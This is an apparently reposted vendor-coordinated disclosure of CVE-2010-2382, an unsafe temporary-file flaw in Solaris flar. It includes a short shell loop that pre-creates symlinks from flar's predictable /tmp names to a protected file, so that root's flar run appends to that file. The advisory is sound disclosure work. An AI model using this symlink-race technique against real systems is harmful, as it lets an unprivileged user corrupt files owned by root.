Solaris flar an unsafe use of temporary files

2010.07.23
Credit: null
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Below is the full disclosure information for CVE-2010-2382. It was reported to security-alert@sun.com on 23 December, 2009 and assigned Sun bug 6912851. This vulnerability was addressed by Sun/Oracle in the July 2010 Critical Patch Update (http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html). - ------ flar appears to use several hard-coded temporary paths with the process id appended such as these (possibly more--I didn't do an exhaustive search): /tmp/.flash_filter_one_.11534 /tmp/.flash_filter_two_.11534 /tmp/.flarcreate.hash.11534 As an unprivileged user, I was able to pre-create symlinks (for every likely pid) to a file I didn't have write permission to like this: $ x=0 $ while [ "$x" -le 30000 ];do > ln -s /etc/important /tmp/.flash_filter_one_.$x > x=$(expr "$x" + 1) > done Later, when root creates a flash archive with: # flar create -n junk `pwd`/junk.flar /etc/important is appended to. - ------ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.3 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBTEUJoWKGA6cQSpZSAQInYAf/W9LWENhsVqmyItxRdr5brhXMoFmxfLe2 jeN8KHJQMlUofI4GImVKO7078dE2CKht7lERpx2F6euXazDy1nG6QenBeSsRo8Ga 4fqhRlKswL+yb092pVZWIuLgNd5S2aqscoFG1q9cvWeF4qXuqyxQCraoA6HumfLc WLMy3bcHsCkTS3+vT4axLO6PaoQbe1d0U0i8RPgc9s7cx4gHO04bQ/bmJnLocdKG 8aUkeQKZpc2Uws5F8goGfC3RfR9WxQMcZMzLfyM3FhxhCPxOtS0YdNPGOwGCYUTr GeRQJemYYWxlK/SLMR/1tKYFa9JHbH+Nep+DVhzcHN7+HFr2kDOQiw== =gcPO -----END PGP SIGNATURE-----


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top